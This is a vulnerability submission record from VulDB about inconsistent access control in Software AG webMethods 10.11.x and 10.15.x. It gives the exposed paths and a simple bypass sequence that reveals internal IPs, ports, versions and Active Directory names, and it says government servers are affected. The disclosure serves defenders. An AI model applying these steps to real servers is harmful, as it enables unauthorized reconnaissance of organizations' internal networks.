| عنوان | Software AG Web Methods 10.11.x, 10.15.x Inconsistent Access Control |
|---|
| الوصف | An issue in SoftwareAG WebMethods v.10.11.x and v.10.15.x allows a remote attacker to obtain sensitive information via the wm.server/connect/ or /assets/ files.
Some times, To access such file like /assets/, a popup may ask you to provide the username and password, just click CANCEL and you'll be redirected to the directory, on the top left cornet you'll find FQDN for the application server in ACTIVE DIRECTORY.
If you visited /invoke/wm.server/connect , you'll be able to see all listed data from internal IPs, ports, versions.
In some cases, I've noticed that it refuse connection to /assets/ directory for example, but if we entered /assets/x as a false value, then come back to /assets/ we will be able to see folder content, I think it's due to insufficient access control where referrer header maybe trusted.
* there's a governmental entities vulnerable to this vulnerability, their internal IPs, Ports, Active Directory FQDN exposed to public due to this bug.
|
|---|
| المستخدم | mohammedhashayka (UID 58817) |
|---|
| ارسال | 22/11/2023 07:35 AM (3 سنوات منذ) |
|---|
| الاعتدال | 07/12/2023 01:51 PM (15 days later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 247158 [Software AG WebMethods 10.11.x/10.15.x wm.server/connect/ تجاوز الصلاحيات] |
|---|
| النقاط | 17 |
|---|